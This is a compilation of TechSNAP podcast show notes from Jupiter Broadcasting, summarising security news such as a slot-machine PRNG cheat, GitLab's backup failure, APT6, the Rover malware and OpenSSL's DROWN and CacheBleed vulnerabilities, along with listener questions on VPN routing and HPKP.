router – Jupiter Broadcasting

“I have a server with 2 1GB NICs, an un-managed switch, and a single gateway. Ideally, I would like WAN traffic routed through a PIA VPN
using openVPN, and LAN traffic to be routed locally without a VPN.”
Unmanaged switch isn’t ideal, but it’s far from bad.
Assuming the server will act as firewall / gateway
NIC #1 to router/modem, NIC #2 to switch with a static IP (say 10.1.1.1)
run a DHCP server on there, handing out 10.1.1.1 as the default gateway, DNS as you see fit
everything from LAN will go out via NIC #2 of server
server connects to VPN provider via OpenVPN. There are options on to set the default gateway. This is the gateway which the server will use. All traffic leaving your network will go out to that destination.
Not having used PIA, but I’ll guess you want your OpenVPN connection to accept their configuration settings (dns, etc) and use that on your server while it is running OpenVPN.

A Protocol For Distributed Multiparty Chat Encryption

review by nccgroup.
The protocol has the following security properties for group messaging:
Confidentiality: the conversation is not readable to an outsider
Forward secrecy: conversation history remains unreadable to an outsider even if participants’ encryption keys are compromised
Deniable authentication: Nobody can prove your participation in a chat
Authorship: A message recipient can be assured of the sender’s authenticity even if other participants in the room try to impersonate the sender
Room consistency: Group chat participants are confident that they are in the same room
Transcript consistency: Group chat participants are confident that they are seeing the same sequence of messages

I’m giving up on HPKP

what is HTTP PKP?
https://securityheaders.io – belongs to author
Be Afraid Of HTTP Public Key Pinning (HPKP)
Certificate Authority Authorisation – Later this year all CAs will be required to check a new DNS record called CAA before issuing a certificate – you can set a DNS record that specifies which CA you authorise to issue certs for your domain
Certificate Transparency – Once CT is a requirement no CA will be able to issue a certificate in secret without the owner of the domain knowing about it because it will be present in publicly visible CT logs. See crt.sh
OCSP leaks information
What is OCSP (Online Certificate Status Protocol)?

Feedback

Database migrations in Episode 332
Extra skimming prevention tip
Let’s Encrypt uses ~/.well-known/ directory – referenced in How It Works, but not named and explicity named in the Integration Guide

Round Up:

The post HPKP: Hard to Say, Hard to Use | TechSNAP 334 first appeared on Jupiter Broadcasting.

Gambling with Code | TechSNAP 305

chris — Tue, 07 Feb 2017 23:31:28 +0000

RSS Feeds:

Become a supporter on Patreon:

Show Notes:

Russians Engineer a Brilliant Slot Machine Cheat—And Casinos Have No Fix

In this case, it was the accountants who noticed something was wrong.
What? No centralised real-time monitoring?
IN EARLY JUNE 2014, accountants at the Lumiere Place Casino in St. Louis noticed that several of their slot machines had—just for a couple of days—gone haywire. The government-approved software that powers such machines gives the house a fixed mathematical edge, so that casinos can be certain of how much they’ll earn over the long haul—say, 7.129 cents for every dollar played. But on June 2 and 3, a number of Lumiere’s machines had spit out far more money than they’d consumed, despite not awarding any major jackpots, an aberration known in industry parlance as a negative hold. Since code isn’t prone to sudden fits of madness, the only plausible explanation was that someone was cheating.
Casino security pulled up the surveillance tapes and eventually spotted the culprit, a black-haired man in his thirties who wore a Polo zip-up and carried a square brown purse. Unlike most slots cheats, he didn’t appear to tinker with any of the machines he targeted, all of which were older models manufactured by Aristocrat Leisure of Australia. Instead he’d simply play, pushing the buttons on a game like Star Drifter or Pelican Pete while furtively holding his iPhone close to the screen.
He’d walk away after a few minutes, then return a bit later to give the game a second chance. That’s when he’d get lucky. The man would parlay a $20 to $60 investment into as much as $1,300 before cashing out and moving on to another machine, where he’d start the cycle anew. Over the course of two days, his winnings tallied just over $21,000. The only odd thing about his behavior during his streaks was the way he’d hover his finger above the Spin button for long stretches before finally jabbing it in haste; typical slots players don’t pause between spins like that.
On June 9, Lumiere Place shared its findings with the Missouri Gaming Commission, which in turn issued a statewide alert. Several casinos soon discovered that they had been cheated the same way, though often by different men than the one who’d bilked Lumiere Place. In each instance, the perpetrator held a cell phone close to an Aristocrat Mark VI model slot machine shortly before a run of good fortune.
By examining rental-car records, Missouri authorities identified the Lumiere Place scammer as a 37-year-old Russian national. He had flown back to Moscow on June 6, but the St. Petersburg–based organization he worked for, which employs dozens of operatives to manipulate slot machines around the world, quickly sent him back to the United States to join another cheating crew. The decision to redeploy him to the US would prove to be a rare misstep for a venture that’s quietly making millions by cracking some of the gaming industry’s most treasured algorithms.
Russia has been a hotbed of slots-related malfeasance since 2009, when the country outlawed virtually all gambling. (Vladimir Putin, who was prime minister at the time, reportedly believed the move would reduce the power of Georgian organized crime.) The ban forced thousands of casinos to sell their slot machines at steep discounts to whatever customers they could find. Some of those cut-rate slots wound up in the hands of counterfeiters eager to learn how to load new games onto old circuit boards. Others apparently went to the supect’s bosses in St. Petersburg, who were keen to probe the machines’ source code for vulnerabilities.
By early 2011, casinos throughout central and eastern Europe were logging incidents in which slots made by the Austrian company Novomatic paid out improbably large sums. Novomatic’s engineers could find no evidence that the machines in question had been tampered with, leading them to theorize that the cheaters had figured out how to predict the slots’ behavior. “Through targeted and prolonged observation of the individual game sequences as well as possibly recording individual games, it might be possible to allegedly identify a kind of ‘pattern’ in the game results,” the company admitted in a February 2011 notice to its customers.
Recognizing those patterns would require remarkable effort. Slot machine outcomes are controlled by programs called pseudorandom number generators that produce baffling results by design. Government regulators, such as the Missouri Gaming Commission, vet the integrity of each algorithm before casinos can deploy it.
But as the “pseudo” in the name suggests, the numbers aren’t truly random. Because human beings create them using coded instructions, PRNGs can’t help but be a bit deterministic. (A true random number generator must be rooted in a phenomenon that is not manmade, such as radioactive decay.) PRNGs take an initial number, known as a seed, and then mash it together with various hidden and shifting inputs—the time from a machine’s internal clock, for example—in order to produce a result that appears impossible to forecast. But if hackers can identify the various ingredients in that mathematical stew, they can potentially predict a PRNG’s output. That process of reverse engineering becomes much easier, of course, when a hacker has physical access to a slot machine’s innards.
Knowing the secret arithmetic that a slot machine uses to create pseudorandom results isn’t enough to help hackers, though. That’s because the inputs for a PRNG vary depending on the temporal state of each machine. The seeds are different at different times, for example, as is the data culled from the internal clocks. So even if they understand how a machine’s PRNG functions, hackers would also have to analyze the machine’s gameplay to discern its pattern. That requires both time and substantial computing power, and pounding away on one’s laptop in front of a Pelican Pete is a good way to attract the attention of casino security.
On December 10, not long after security personnel spotted the suspect inside the Hollywood Casino in St. Louis, four scammers were arrested. Because he and his cohorts had pulled their scam across state lines, federal authorities charged them with conspiracy to commit fraud. The indictments represented the first significant setbacks for the St. Petersburg organization; never before had any of its operatives faced prosecution.
The Missouri and Singapore cases appear to be the only instances in which scammers have been prosecuted, though a few have also been caught and banned by individual casinos. At the same time, the St. Petersburg organization has sent its operatives farther and farther afield. In recent months, for example, at least three casinos in Peru have reported being cheated by Russian gamblers who played aging Novomatic Coolfire slot machines.
The economic realities of the gaming industry seem to guarantee that the St. Petersburg organization will continue to flourish. The machines have no easy technical fix. As Hoke notes, Aristocrat, Novomatic, and any other manufacturers whose PRNGs have been cracked “would have to pull all the machines out of service and put something else in, and they’re not going to do that.” (In Aristocrat’s statement to WIRED, the company stressed that it has been unable “to identify defects in the targeted games” and that its machines “are built to and approved against rigid regulatory technical standards.”) At the same time, most casinos can’t afford to invest in the newest slot machines, whose PRNGs use encryption to protect mathematical secrets; as long as older, compromised machines are still popular with customers, the smart financial move for casinos is to keep using them and accept the occasional loss to scammers.
So the onus will be on casino security personnel to keep an eye peeled for the scam’s small tells. A finger that lingers too long above a spin button may be a guard’s only clue that hackers in St. Petersburg are about to make another score.

Netgear Exploit Found in 31 Models Lets Hackers Turn Your Router Into a Botnet

This came to our attention from Shawn
For most people, routers are the little boxes which sit between you and your ISP. They do NAT, possibly firewall, and general stop the outside world from getting in without your permission. Well, that’s what they are supposed to do. The issue, long standing, is updates. When vulnerabilities are found, the code needs to be patched. With these devices, that issues can be troublesome, given that everyday consumers cannot be expected to update them. For us geeks, this isn’t so much as an issue, if the updates are made available to us
We patch our own systems already, patching the firmware on a device… we can do that too.
The vast majority of router users are unaware that they require an update. They sit there waiting, and sometimes they are found. When they are found to have a vulnerability, they can become part of a bot-net, a huge collection of devices ready to do the bidding of those with ill-intent. These bot-nets can be used for a variety of malicious purposes. Why do this? Most often, it’s money.
This story is about someone discovering a problem with their router, and then exploring it.

GitLab.com melts down after wrong directory deleted, backups fail

This also came from Shawn
Source-code hub GitLab.com is in meltdown after experiencing data loss as a result of what it has suddenly discovered are ineffectual backups.
On Tuesday evening, Pacific Time, the startup issued a sobering series of tweets we’ve listed below. Behind the scenes, a tired sysadmin, working late at night in the Netherlands, had accidentally deleted a directory on the wrong server during a frustrating database replication process: he wiped a folder containing 300GB of live production data that was due to be replicated.
Just 4.5GB remained by the time he canceled the rm -rf command. The last potentially viable backup was taken six hours beforehand.
That Google Doc mentioned in the last tweet notes: “This incident affected the database (including issues and merge requests) but not the git repos (repositories and wikis).”
So some solace there for users because not all is lost. But the document concludes with the following:
So in other words, out of 5 backup/replication techniques deployed none are working reliably or set up in the first place.
The world doesn’t contain enough faces and palms to even begin to offer a reaction to that sentence. Or, perhaps, to summarise the mistakes the startup candidly details as follows:
- LVM snapshots are by default only taken once every 24 hours. YP happened to run one manually about 6 hours prior to the outage
- Regular backups seem to also only be taken once per 24 hours, though YP has not yet been able to figure out where they are stored. According to JN these don’t appear to be working, producing files only a few bytes in size.
- SH: It looks like pg_dump may be failing because PostgreSQL 9.2 binaries are being run instead of 9.6 binaries. This happens because omnibus only uses Pg 9.6 if data/PG_VERSION is set to 9.6, but on workers this file does not exist. As a result it defaults to 9.2, failing silently. No SQL dumps were made as a result. Fog gem may have cleaned out older backups.
- Disk snapshots in Azure are enabled for the NFS server, but not for the DB servers.
- The synchronisation process removes webhooks once it has synchronised data to staging. Unless we can pull these from a regular backup from the past 24 hours they will be lost
- The replication procedure is super fragile, prone to error, relies on a handful of random shell scripts, and is badly documented
- Our backups to S3 apparently don’t work either: the bucket is empty
Making matters worse is the fact that GitLab last year decreed it had outgrown the cloud and would build and operate its own Ceph clusters. GitLab’s infrastructure lead Pablo Carranza said the decision to roll its own infrastructure “will make GitLab more efficient, consistent, and reliable as we will have more ownership of the entire infrastructure.”
See also GitLab.com Database Incident
see also Catastrophic Failure – Myth Weavers – My thanks to Rikai for bringing this to our attention.
example of why making sure your backup solution is solid as hell is extremely important
The guy is completly honest and takes ownership of the mistakes he made. Hopefully others can learn from his mistakes.
For context, myth-weavers is a website that handles things like the creation/managing and sharaing of D&D (and other tabletop RPG) character sheets online ( https://www.myth-weavers.com/sheetindex.php ), they lost about 6 months of data.
Backup automation is good, because people will fail and skip steps more often than computers will, and this is a perfect example of that.
The trick is getting it done RIGHT and having it NOTIFY you when something ISN’T right. As well as making it consistent, reproducible and redundant if possible. This is also an example of why if you have data you care about, that step should not be skipped.
Automated backups are a lot of up-front work that people often avoid doing, at least partially and regret it later. This is a well documented postmortem of what happens when you do that and why you should set aside the time and get it done
Not exactly mission-critical data, but still very important data for the audience they cater too. Handcrafted, imagination-related kinda stuff
This GitLab outage and database deletion & lack of backups is a great reminder to routinely test your disaster recovery strategies
Dataloss at GitLab
Thoughts On Gitlab Data Incident
Blameless PostMortems and a Just Culture

Feedback:

Round Up:

The post Gambling with Code | TechSNAP 305 first appeared on Jupiter Broadcasting.

Internet of Voice Triggers | TechSNAP 302

chris — Tue, 17 Jan 2017 07:37:39 +0000

RSS Feeds:

Become a supporter on Patreon:

Show Notes:

Malware hosted in your browser

Last show, we talked about malware, blocking it via URLs, and malware which spoofs the domain names, thereby bypassing many URL-based filters.
This show, we have an instance of malware which completely defeats all of the above, in a very simple and clever way.
A common way to steal credentials is hosting a webpage which looks a lot like the real thing. Google, Facebook, Paypal, etc are all targets of this. It is simple to do. Just throw up a web page, and start directing people to it.
Lots of ways to defeat this with conventional tools
This method bypasses all those tools
Tom Scott tweeted about malware he received via email.
when you click on the link, you get what appears to be a Google Login page.
The URI is of the form: data:text/html,https…… lots of spaces

This week, the FBI says APT6 has pawned the government for the last 5 years, Unaoil: a company that’s bribing the world & Researchers find a flaw in the visa database.

All that plus a packed feedback, roundup & more!

Thanks to:
- Get Paid to Write for DigitalOcean
Direct Download:

HD Video | Mobile Video | MP3 Audio | OGG Audio | YouTube | HD Torrent | Mobile Torrent

RSS Feeds:

HD Video Feed | Mobile Video Feed | MP3 Audio Feed | Ogg Audio Feed | iTunes Feed | Torrent Feed

Become a supporter on Patreon:

Show Notes:

FBI says APT6 has pwning the government for the last 5 years
- The feds warned that “a group of malicious cyber actors,” whom security experts believe to be the government-sponsored hacking group known as APT6, “have compromised and stolen sensitive information from various government and commercial networks” since at least 2011, according to an FBI alert obtained by Motherboard
- The official advisory is available on the Open Threat Exchange website
- The alert, which is also available online, shows that foreign government hackers are still successfully hacking and stealing data from US government’s servers, their activities going unnoticed for years. This comes months after the US government revealed that a group of hackers, widely believed to be working for the Chinese government, had for more than a year infiltrated the computer systems of the Office of Personnel Management, or OPM. In the process, they stole highly sensitive data about several millions of government workers and even spies.
- In the alert, the FBI lists a long series of websites used as command and control servers to launch phishing attacks “in furtherance of computer network exploitation (CNE) activities [read: hacking] in the United States and abroad since at least 2011.” Domains controlled by the hackers were “suspended” as of late December 2015, according to the alert, but it’s unclear if the hackers have been pushed out or they are still inside the hacked networks.
- Looks like they were in for years before they were caught, god knows where they are,” Michael Adams, an information security expert who served more than two decades in the US Special Operations Command, and who has reviewed the alert, told Motherboard. “Anybody who’s been in that network all this long, they could be anywhere and everywhere.
- “This is one of the earlier APTs, they definitely go back further than 2011 or whatever—more like 2008 I believe,” Kurt Baumgartner, a researcher at the Russian security firm Kaspersky Lab, told me. (Baumgartner declined to say whether the group was Chinese or not, but said its targets align with the interest of a state-sponsored attacker.)
- Kyrk Storer, a spokesperson with FireEye, confirmed that the domains listed in the alert “were associated with APT6 and one of their malware backdoors,” and that the hackers “targeted the US and UK defense industrial base.” APT6 is ”likely a nation-state sponsored group based in China,” according to FireEye, which ”has been dormant for the past several years.”
- Another researcher at a different security company, who spoke on condition of anonymity because he wasn’t authorized to speak publicly about the hacker’s activities, said this was the “current campaign of an older group,” and said there “likely” was an FBI investigation ongoing. (Several other security companies declined to comment for this story.) At this point, it’s unclear whether the FBI’s investigation will lead to any concrete result. But two years after the US government charged five Chinese military members for hacking US companies, it’s clear hackers haven’t given up attacking US targets.
Unaoil: the company that bribed the world
- After a six-month investigation across two continents, Fairfax Media and The Huffington Post are revealing that billions of dollars of government contracts were awarded as the direct result of bribes paid on behalf of firms including British icon Rolls-Royce, US giant Halliburton, Australia’s Leighton Holdings and Korean heavyweights Samsung and Hyundai.
- A massive leak of confidential documents, and a large email, has for the first time exposed the true extent of corruption within the oil industry, implicating dozens of leading companies, bureaucrats and politicians in a sophisticated global web of bribery.
- The investigation centres on a Monaco company called Unaoil.
- Following a coded ad in a French newspaper, a series of clandestine meetings and midnight phone calls led to our reporters obtaining hundreds of thousands of the Ahsanis’ leaked emails and documents.
- The leaked files expose as corrupt two Iraqi oil ministers, a fixer linked to Syrian dictator Bashar al-Assad, senior officials from Libya’s Gaddafi regime, Iranian oil figures, powerful officials in the United Arab Emirates and a Kuwaiti operator known as “the big cheese”.
- Western firms involved in Unaoil’s Middle East operation include some of the world’s wealthiest and most respected companies: Rolls-Royce and Petrofac from Britain; US companies FMC Technologies, Cameron and Weatherford; Italian giants Eni and Saipem; German companies MAN Turbo (now know as MAN Diesal & Turbo) and Siemens; Dutch firm SBM Offshore; and Indian giant Larsen & Toubro. They also show the offshore arm of Australian company Leighton Holdings was involved in serious, calculated corruption.
- The leaked files reveal that some people in these firms believed they were hiring a genuine lobbyist, and others who knew or suspected they were funding bribery simply turned a blind eye.
- The files expose the betrayal of ordinary people in the Middle East. After Saddam Hussein was toppled, the US declared Iraq’s oil would be managed to benefit the Iraqi people. Today, in part one of the ‘Global Bribe Factory’ expose, that claim is demolished.
- It is the Monaco company that almost perfected the art of corruption.
- It is called Unaoil and it is run by members of the Ahsani family – Monaco millionaires who rub shoulders with princes, sheikhs and Europe’s and America’s elite business crowd.
- How they make their money is simple. Oil-rich countries often suffer poor governance and high levels of corruption. Unaoil’s business plan is to play on the fears of large Western companies that they cannot win contracts without its help.
- Its operatives then bribe officials in oil-producing nations to help these clients win government-funded projects. The corrupt officials might rig a tender committee. Or leak inside information. Or ensure a contract is awarded without a competitive tender.
- On a semi-related note, another big story for you to go read:
- How to hack an Election from someone who has done it, more than once
Researchers find flaw in Visa database
- No, not that kind of Visa, the other one.
- Systems run by the US State Department, that issue Travel Visas that are required for visitors from most countries to be admitted to the US
- This has very important security considerations, as the application process for getting a visa is when most security checks are done
- Cyber-defense experts found security gaps in a State Department system that could have allowed hackers to doctor visa applications or pilfer sensitive data from the half-billion records on file, according to several sources familiar with the matter –- though defenders of the agency downplayed the threat and said the vulnerabilities would be difficult to exploit.
- Briefed to high-level officials across government, the discovery that visa-related records were potentially vulnerable to illicit changes sparked concern because foreign nations are relentlessly looking for ways to plant spies inside the United States, and terrorist groups like ISIS have expressed their desire to exploit the U.S. visa system, sources added
- After commissioning an internal review of its cyber-defenses several months ago, the State Department learned its Consular Consolidated Database –- the government’s so-called “backbone” for vetting travelers to and from the United States –- was at risk of being compromised, though no breach had been detected, according to sources in the State Department, on Capitol Hill and elsewhere.
- As one of the world’s largest biometric databases –- covering almost anyone who has applied for a U.S. passport or visa in the past two decades -– the “CCD” holds such personal information as applicants’ photographs, fingerprints, Social Security or other identification numbers and even children’s schools.
- “Every visa decision we make is a national security decision,” a top State Department official, Michele Thoren Bond, told a recent House panel.
- Despite repeated requests for official responses by ABC News, Kirby and others were unwilling to say whether the vulnerabilities have been resolved or offer any further information about where efforts to patch them now stand.
- State Department documents describe CCD as an “unclassified but sensitive system.” Connected to other federal agencies like the FBI, Department of Homeland Security and Defense Department, the database contains more than 290 million passport-related records, 184 million visa records and 25 million records on U.S. citizens overseas.
- “Because of the CCD’s importance to national security, ensuring its data integrity, availability, and confidentiality is vital,” the State Department’s inspector general warned in 2011.
Feedback:
Round Up:
The post One Key to Rule Them All | TechSNAP 263 first appeared on Jupiter Broadcasting.

Fixing the Barn Door | TechSNAP 257

chris — Thu, 10 Mar 2016 09:39:46 +0000

To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

We’ll tell you about the real world pirates that hacked a shipping company, the open source libraries from Mars Rover found being used in malware & Microsoft’s solution for that after-hack hangover.

Plus great questions, a packed round up & much more!

Thanks to:

Get Paid to Write for DigitalOcean

Direct Download:

RSS Feeds:

Become a supporter on Patreon:

Show Notes:

Pirates hacked Shipping Company to find valuable cargo

As described in Verizon’s most recent Data Breach Digest, a collection of cyber-security case studies the company’s RISK Team helped investigate and solve sometime in the past year, a reputable global shipping conglomerate started having peculiar problems with sea pirates.
The shipping company was telling Verizon that pirates were boarding their vessels at regular intervals.
Equipped with a barcode reader (and weapons, of course), searching specific crates, emptying all the high-value cargo, and making off with the loot within minutes of launching their attacks.
All of this made the shipping company think there was something strange and hired the RISK Team to track down the source of a possible leak.
The RISK Team quickly narrowed down the problem to the firm’s outdated custom-built CMS, which featured an insecure upload script.
As the Verizon team explained, a hacker, either part of the sea pirates group or hired by them, had uploaded a Web shell via this insecure form. In turn, this shell was uploaded inside a Web-accessible directory.
To make things worse, that particular folder also had “execute” permissions.
Using this access to the shipping firm’s database, the hacker pulled down BoLs (bills of lading), future shipment schedules, and ship routes so the pirates could plan their attack and identify crates holding valuable content.
Fortunately, the hacker wasn’t that skilled. Verizon says that the attacker used a Web shell that didn’t support SSL, meaning that all executed commands were recorded in the Web server’s log.
The RISK Team was able to recreate a historic timeline of all the hacker’s actions and identify exactly what he looked at and where he sent the files.
Verizon’s RISK Team states:

“These threat actors, while given points for creativity, were clearly not highly skilled,” the RISK Team explains. “For instance, we found numerous mistyped commands and observed that the threat actors constantly struggled to interact with the compromised servers.”

Additionally, as a sign of their lack of skills, the attacker also didn’t use a proxy or VPN and exposed their home IP address.
The rest of the Verizon threat digest report
Direct PDF Download

Open source libraries from Mars Rover found being used in malware

According to Palo Alto Networks, on December 24, 2015, India’s Ambassador to Afghanistan received a spear-phishing email that contained a new malware variant, which, if downloaded and installed, would have opened a backdoor on the official’s computer.
India has been a trustworthy business partner for Afghanistan, helping the latter build its new Parliament complex, the Salma Dam, along with smaller transportation, energy, and infrastructure projects.
Because of this tight collaboration between the two, it is normal that other nations or interest groups may want to know what the two countries are planning together.
The Ambassador’s email was spoofed and made to look like it was coming from India’s Defense Minister, Manohar Parrikar. Attached to the email was an RTF file.
Palo Alto researchers say that this file contained malicious code to exploit the CVE-2010-3333 Office XP vulnerability, resulting in the download of a file named “file.exe” from the newsumbrealla[.]net domain.
This file was automatically launched into execution and was a simple malware payload dropper that was tasked with downloading the real threat, a new trojan that the researchers christened Rover.
This malware was given the “Rover” name because it relied on the OpenCV and OpenAL open source libraries, both used in the software deployed with the famous Mars Rover exploration robot.
OpenCV is a library used in computer vision applications and image processing while OpenAL is a cross-platform library for working with multichannel audio data.
Its capabilities included the ability to take screenshots of the desktop in BMP format and send them to the C&C server every 60 minutes, logging keystrokes and uploading the data to the C&C server every 10 seconds, and scanning for Office files and uploading them to the C&C server every 60 minutes.
Additionally, there was also a backdoor component that allowed attackers to send commands from the C&C server and tell Rover to take screenshots or start recording video (via webcam) and audio (via microphone) whenever the attacker wanted to.
“Though ‘Rover’ is an unsophisticated malware lacking modern malware features, it seems to be successful in bypassing traditional security systems and fulfilling the objectives of the threat actor behind the campaign in exfiltrating information from the targeted victim,” Palo Alto researchers explain.
Rover is largely undetected by today’s antivirus engines, and despite not coming with that many features, it is successful at keeping a low profile, exactly what cyber-espionage groups need from their malware to begin with.
New Malware ‘Rover’ Targets Indian Ambassador to Afghanistan – Palo Alto Networks Blog

Microsoft brings post-breach detection features to Windows

Microsoft announced its new post-breach enterprise security service called Windows Defender Advanced Threat Protection, which will respond to these advanced attacks on companies’ networks.
The company found that it currently takes an enterprise more than 200 days to detect a security breach, and 80 days to contain it. When there is such a breach, the attackers can steal company data, find private information, and damage the brand and customer trust in the company.
For example, a social engineering attack might encourage a victim to run a program that was attached to an e-mail or execute a suspicious-looking PowerShell command. The Advanced Persistent Threat (APT) software that’s typically used in such attacks may scan ports, connect to network shares to look for data to steal, or connect to remote systems to seek new instructions and exfiltrate data. Windows Defender Advanced Threat Protection can monitor this behavior and see how it deviates from normal, expected system behavior. The baseline is the aggregate behavior collected anonymously from more than 1 billion Windows systems. If systems on your network start doing something that the “average Windows machine” doesn’t, WDATP will alert you.
The whole thing is cloud-based with no need for any on-premises server. A client on each endpoint is needed, which would presumably be an extended version of the Windows Defender client.
Windows Defender Advanced Threat Protection is under development, though it is currently available to some early-adopter customers.
This service will help enterprises to detect, investigate and respond to advanced attacks on their networks.
Microsoft said that it is building on the existing security defenses Windows 10 offers today, and the new service will provide a post-breach layer of protection to the Windows 10 security stack.
With the client technology built into Windows 10 along with the cloud service, it will help detect threats that have made it past other defenses, provide enterprises with information to investigate the breach across endpoints, and offer response recommendations.
To avoid Windows 7 becoming “the new Windows XP,” the company is being rather more aggressive in applying pressure on users to upgrade to Windows 10 sooner rather than later.
WDATP is going to be part of that same push to Windows 10, and it won’t be available for older operating systems.
Windows Defender Advanced Threat Protection uses cloud power to figure out you’ve been pwned | Ars Technica

Feedback:

Round Up:

The post Fixing the Barn Door | TechSNAP 257 first appeared on Jupiter Broadcasting.

Open Server Sadness Layer | TechSNAP 256

chris — Thu, 03 Mar 2016 17:20:45 +0000

To view this video please enable JavaScript, and consider upgrading to a web browser that supports HTML5 video

OpenSSL issues a major security advisory, we break down the important details, then go in depth on the real world impact of these flaws.

Plus some great storage and networking question, a packed round up & much, much more!

Thanks to:

Get Paid to Write for DigitalOcean

Direct Download:

RSS Feeds:

Become a supporter on Patreon:

Show Notes:

OpenSSL issues major security advisory

OpenSSL has released versions 1.0.2g and 1.0.1s to address a number of vulnerabilities:
CVE-2016-0800 (DROWN): HIGH: Cross-protocol attack on TLS using SSLv2
CVE-2016-0703: HIGH: Divide-and-conquer session key recovery in SSLv2
CVE-2016-0702 (CacheBleed): LOW: Side channel attack on modular exponentiation
CVE-2016-0704: MODERATE: Bleichenbacher oracle in SSLv2
CVE-2016-0705: LOW: Double-free in DSA code
CVE-2016-0798: LOW: Memory leak in SRP database lookups
CVE-2016-0797: LOW: BN_hex2bn/BN_dec2bn NULL pointer deref/heap corruption
CVE-2016-0799: LOW: Fix memory issues in BIO_*printf functions
As per previous announcements, support for OpenSSL version 1.0.1 will cease on 31st December 2016. No security updates for that version will be provided after that date
Support for versions 0.9.8 and 1.0.0 ended on 31st December 2015. Those versions are no longer receiving security updates.

As many as one third of all HTTPS sites vulnerable to DROWN

“More than 11 million websites and e-mail services protected by the transport layer security protocol are vulnerable to a newly discovered, low-cost attack that decrypts sensitive communications in a matter of hours and in some cases almost immediately”
The researchers have dubbed the latest vulnerability DROWN, short for Decrypting RSA with Obsolete and Weakened eNcryption
DROWN Attack
“The attack works against TLS-protected communications that rely on the RSA cryptosystem when the key is exposed even indirectly through SSLv2, a TLS precursor that was retired almost two decades ago because of crippling weaknesses. The vulnerability allows an attacker to decrypt an intercepted TLS connection by repeatedly using SSLv2 to make connections to a server. In the process, the attacker learns a few bits of information about the encryption key each time. While many security experts believed the removal of SSLv2 support from browser and e-mail clients prevented abuse of the legacy protocol, some misconfigured TLS implementations still tacitly support the legacy protocol when an end-user computer specifically requests its use.”
LibreSSL is not affected by DROWN because support for SSLv2 was removed long ago
“Recent scans of the Internet at large show that more than 5.9 million Web servers, comprising 17 percent of all HTTPS-protected machines, directly support SSLv2. The same scans reveal that at least 936,000 TLS-protected e-mail servers also support the insecure protocol. That’s a troubling finding, given widely repeated advice that SSLv2—short for secure sockets layer version 2—be disabled. More troubling still, even when a server doesn’t allow SSLv2 connections, it may still be susceptible to attack if the underlying RSA key pair is reused on a separate server that does support the old protocol.”
So even a locked down and tightened up server can be compromised, if a less secure server shares the same certificate
I have seen this with my bank, when I changed settings in my browser to be more restrictive on what TLS versions and algorithms were used, a specific subdomain of the bank’s site would no longer load properly
“A website, for instance, that forbids SSLv2 may still be vulnerable if its key is used on an e-mail server that allows SSLv2”
How many people think to adjust the settings on their email server to protect their web server?
TLS security hit a new low last May with the discovery of Logjam, a vulnerability caused by deliberately weakened cryptography that allowed eavesdroppers to read and modify data passing through tens of thousands of Web and e-mail servers
“It’s pretty practical because if you know you want to target certain websites and they’re vulnerable, you can pretty much set up shop and the next thing you know you have all of these secure connections, the passwords, and everything else,” Matt Green, a cryptography expert at Johns Hopkins University who has read the research paper, told Ars. “It’s amazing to me that we keep finding one or two of these [vulnerabilities] per year for protocols that are this old. This shouldn’t keep happening. It kind of makes me feel like we’re not doing our jobs.”
“Tuesday’s OpenSSL updates make it impossible for ordinary end users to enable SSLv2 without declaring explicit intent to do so. The patch also removes support for extremely weak 1990s-era ciphers that are key to making DROWN attacks work. The weak ciphers were added to all SSL and TLS versions prior to 2000 as part of US government’s export regulations”
“Microsoft’s IIS versions 7.0 and on and versions 3.13 and above of the NSS crypto library all have SSLv2 disabled by default. Anyone using older versions of either of these programs should upgrade right away.”
“The most general DROWN attack exploits 1990s-era cryptography that uses extremely weak 40-bit symmetric encryption so software would comply with export restrictions. The attacker captures roughly 1,000 RSA key exchanges made between an end user and a vulnerable TLS server, and the connections can use any version of the SSL or TLS protocols, including the current TLS 1.2. The attacker then uses the intercepted RSA ciphertexts to initiate several thousand SSLv2 connection attempts that include an instruction for the server to use the 40-bit cipher. The attacker then compares the ciphertext to all the 240 possibilities”
“Decrypting the TLS connection requires just 250 computations, a task that in a worst-case scenario Amazon’s EC2 service can perform in eight hours for just $440. The researchers devised an alternate decryption method that uses a cluster of graphics cards and takes 18 hours”
“The researchers also devised a significantly more severe version of DROWN that works against servers running versions of OpenSSL that haven’t been patched since March 2015. It allows attackers to decrypt the “premaster secret” almost instantly. An attacker can use the technique to perform man-in-the-middle attacks that cryptographically impersonate a vulnerable server. Scans performed by the researchers show that a significant percentage of servers vulnerable to DROWN are also susceptible to this more severe version of the exploit. The finding suggests that a surprisingly large number of OpenSSL users have yet to install the March 2015 update, which unknowingly fixed the vulnerabilities that make the more severe attack possible.”
“DROWN is an extension of what cryptographers call the 1998 Bleichenbacher attack, named after Daniel Bleichenbacher, the Swiss cryptographer who discovered the underlying weakness in the PKCS#1 v1 encoding function. While considered a seminal exploit for the mathematical insight it provided, it wasn’t considered especially practical, because it required attackers to make hundreds of thousands or millions of connections to the victim server to compromise a single session key.”
“Ironically, some of the Bleichenbacher countermeasures built into the SSLv2 provided precisely the type of data required to carry out the type of so-called “padding oracle” attack that Bleichenbacher discovered. The Bleichenbacher defenses, it turned out, provided its own oracle that exposed TLS version 1.0 and later exposed it to plaintext recovery attacks. The DROWN research is notable not only because it requires many fewer queries to the server, but also because its cross-protocol nature allows attackers to exploit the SSLv2 weakness to defeat the separate TLS specification. The DROWN findings are also significant because they were the first to identify the ineffectiveness of the Bleichenbacher countermeasures, some two decades after they were added to SSLv2.”
Additional Coverage: CSO Online — Latest attack against TLS shows the pitfalls of intentionally weakening encryption
There is actually a second major exploit that is fixed by this recent OpenSSL update
While this one requires local access to the machine, and is much harder to pull off, the results could be quite disastrous
CacheBleed: A Timing Attack on OpenSSL Constant Time RSA
“CacheBleed is a side-channel attack that exploits information leaks through cache-bank conflicts in Intel processors. By detecting cache-bank conflicts via minute timing variations, we are able to recover information about victim processes running on the same machine. Our attack is able to recover both 2048-bit and 4096-bit RSA secret keys from OpenSSL 1.0.2f running on Intel Sandy Bridge processors after observing only 16,000 secret-key operations (decryption, signatures). This is despite the fact that OpenSSL’s RSA implementation was carefully designed to be constant time in order to protect against cache-based (and other) side-channel attacks.”
“While the possibility of an attack based on cache-bank conflicts has long been speculated, this is the first practical demonstration of such an attack. Intel’s technical documentation describes cache-bank conflicts as early as 2004. However, these were not widely thought to be exploitable, and as a consequence common cryptographic software developers have not implemented countermeasures to this attack.”
